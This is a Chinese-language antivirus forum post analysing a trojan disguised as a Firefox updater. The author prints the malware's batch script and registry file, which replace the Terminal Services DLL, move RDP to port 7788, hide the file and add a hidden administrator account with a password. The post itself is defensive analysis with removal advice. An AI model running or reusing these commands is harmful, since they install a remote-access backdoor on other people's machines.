瑞星卡卡安全论坛

今天碰到了个这样的病毒FireFoxUpdater.exe,这个病毒是压缩文件的自解压文件,可以用WINRAR打开,可以看到里面的文件为:
一个可执行文件和一个自解压文件
我再把这个自解压文件,用WINRAR解压.后发现为改病毒包含的主要文件有:
888.bat
7788.reg
termsrvgmm.dll

后面那个文件为病毒体,经过测试下列杀毒软件都查不到:
金山毒霸和金山在线杀毒
瑞星在线杀毒和瑞星杀毒软件
卡巴基斯

第一次碰到卡巴无法查到的病毒,我感觉郁闷,虽然FireFoxUpdater.exe能被识别,但是在杀毒结束后,就在系统目录:x:\winnt\system32或x:\windows\system32出现termsrvgmm.dll一个隐藏的只读的文件,根据它的辅助文件
7788.reg可以知道该病毒会开启7788端口,来做后门

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00001e6c

根据批处理可以知道改病毒会对TS服务处理


@sc config termservice start= auto
@sc config dcomlaunch start= auto
@net start dcomlaunch
@net start termservice
@tasklist /svc >gggggg.txt
@FINDSTR /i "TermService" gggggg.txt >kkkkkk.txt
@FOR /F "tokens=2 delims= " %%1 in (kkkkkk.txt) do ntsd -c q -p %%1
@REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\System32\termsrvgmm.dll /f
@copy termsrvgmm.dll %SystemRoot%\System32\termsrvgmm.dll
@Attrib +H +S +R %SystemRoot%\System32\termsrvgmm.dll
@copy termsrvgmm.dll %SystemRoot%\system32\dllcache\termsrvgmm.dll
@attrib +h +s +r %SystemRoot%\system32\dllcache\termsrvgmm.dll

并拷贝DLL到系统目录


启用
@net user admin$ qq1234 /add
@net localgroup administrators admin$ /add
下面的帐号
为自己的后门获得最高权限,这个病毒做的很垃圾,我没心思去DOWN个虚拟机来调试,感觉DOS命令玩的不错,我在这里先BS一下,我最讨厌做病毒的垃圾~~~没什么技术,做个病毒惹人烦.我比较懒,所以最怕烦,前段时间那个破熊猫就是讨厌..哎~~
我估计改病毒是利用系统漏洞来传播,由于DLL有MS的版本号等,不容易被发现,但是其隐藏的属性..让人一看就是病毒,我的SYSTEM32目录下没有隐藏文件,即使有,我也把它处理了,一个多个隐藏文件就知道要处理垃圾了.
哎~~目前比较容易的方法就是删除文件,打上补丁,装个防火墙,装了瑞星防火墙就没见进来,再端口规则上加了7788禁止,其它的都省了.
如果有..比较简单而又干净的方法告诉一下,我处理,太麻烦的就算了呵呵~~~



瑞星卡巴图不截了,不然还要我重装,不够烦的.顺便来个金山的

[用户系统信息]Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)


附件: 10180462008229152213.jpg

病毒样本就不传了，需要说一下~~我再传~~丢那了找起来麻烦~~~

样本上报给瑞星：
http://up.rising.com.cn/webmail/uploadnew.htm

我看到了.还有另一个BAT文件
A,BAT

@echo off
sleep 300
del FireFoxUpdater.exe
del a.bat
cls
EXIT

那玩意做的太拉圾.
我还以为火狐木马
谁知是假FIRE FOX的木马
在SYSTEM目录和C:\WINNT\
前几天的杀毒查不出来...过全部杀软..

什么破病毒!